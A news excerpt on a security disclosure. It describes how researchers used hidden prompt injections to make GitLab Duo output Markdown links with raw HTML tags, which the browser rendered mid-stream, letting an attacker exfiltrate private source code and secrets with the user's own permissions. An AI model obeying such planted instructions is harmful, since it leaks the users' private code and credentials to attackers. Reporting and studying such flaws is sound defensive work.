AI prompt injection leads to HTML injection: Duo sends responses to users in a chatbot HTML-based interface that uses the Markdown language to format text. The researchers observed that its answers were rendered progressively as they streamed in from the backend LLM and that gave them the idea that if they managed to inject HTML tags in a prompt, they would be rendered and interpreted by the browser.”At this point, we realized that we could already craft malicious Markdown URLs and have them displayed to the user,” the researchers stated. “So, we asked: what if the URLʼs label itself contained raw HTML? If Duo renders responses in real time, the browser might interpret that HTML before any proper sanitization kicks in.”The test worked with a prompt that asked the AI assistant to insert an URL that then opened an <img> HTML tag. IMG tags in HTML can load from the pictures from an external server but also support JavaScript code inside and so do FORM and A tags.This newfound ability to execute arbitrary HTML in the user’s browser gave researchers another idea. Since most GitLab users also have access to private projects, if the attacker can find out the URL of such a private project, they can piggyback on the user’s permissions to read code from it, encode it and send it back out to a server under their control, in other words, leak sensitive and private source code. This becomes even more critical if they can determine the location of a file containing secrets in the repository, such as API tokens or other credentials.”This security flaw shows how powerful and risky AI assistants like GitLab Duo can be when they blindly trust content from the page,” the researchers wrote. “By sneaking in hidden prompts and raw HTML, we were able to make Duo leak private source code without the user clicking a single thing.”GitLab patched the HTML injection by preventing Duo from rendering risky tags like <img> or <form> that point to external domains other than gitlab.com. However, the other prompt injection scenarios that did not involve HTML rendering remain unpatched as GitLab doesn’t consider them security issues because they don’t directly result in unauthorized access or code execution.
First seen on csoonline.com
Jump to article: www.csoonline.com/article/3992845/prompt-injection-flaws-in-gitlab-duo-highlights-risks-in-ai-assistants.html